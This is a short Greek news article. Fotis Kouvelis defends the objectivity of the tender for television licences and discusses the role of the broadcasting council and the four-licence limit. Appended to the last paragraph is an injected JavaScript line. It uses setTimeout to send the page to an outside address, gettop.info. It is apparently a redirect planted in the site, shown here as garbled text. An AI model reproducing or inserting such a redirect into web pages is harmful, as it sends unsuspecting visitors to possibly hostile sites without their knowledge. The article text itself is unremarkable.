Κουβέλης: Αντικειμενική και αξιοκρατική η διαδικασία αδειοδότησης των καναλιών

0
38

 

«Οι διαδικασίες που έχουν επιλεγεί και ο τρόπος που έχει δομηθεί και αποφασιστεί ο διαγωνισμός για τις τηλεοπτικές άδειες έχουν αντικειμενικά κριτήρια, όρους και προϋποθέσεις και προωθούν την απόλυτη αντικειμενικότητα και αξιοκρατία στην τελική κρίση», τόνισε ο πρόεδρος της Eνωτικής Kίνησης της Ευρωπαϊκής Αριστεράς, Φώτης Κουβέλης.

Μιλώντας στο Πρώτο Πρόγραμμα ο κ.Κουβέλης επεσήμανε: «Δεν μπορώ να προβλέψω εάν υπάρξουν άλλης τάξεως ζητήματα και δεν είναι δυνατόν να τα προεκτιμήσω».

Επισήμανε ότι η άποψη που διατυπώνεται, ότι ο διαγωνισμός έπρεπε να γίνει από το Εθνικό Συμβούλιο Ραδιοτηλεόρασης, δεν ευσταθεί γιατί το κράτος δεν έχει εκχωρήσει την αρμοδιότητα έκδοσης τηλεοπτικών αδειών στο Ραδιοτηλεοπτικό Συμβούλιο, πολύ περισσότερο τώρα που δεν είναι συγκροτημένο.

Επίσης, ο κ. Κουβέλης αναφέρθηκε και στον αριθμό των τεσσάρων αδειών και στο ερώτημα εάν υπηρετεί την πολυφωνία, λέγοντας ότι «οι ενδιαφερόμενοι διατηρούν το δικαίωμα να προωθήσουν στα Ελληνικά και Ευρωπαϊκά δικαστήρια τα αιτήματά τους και ενδεχομένως να αναζητήσουν εκείνο, που κατά το νόμο πιστεύουν ότι μπορεί να δικαιώσει την άποψή τους». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here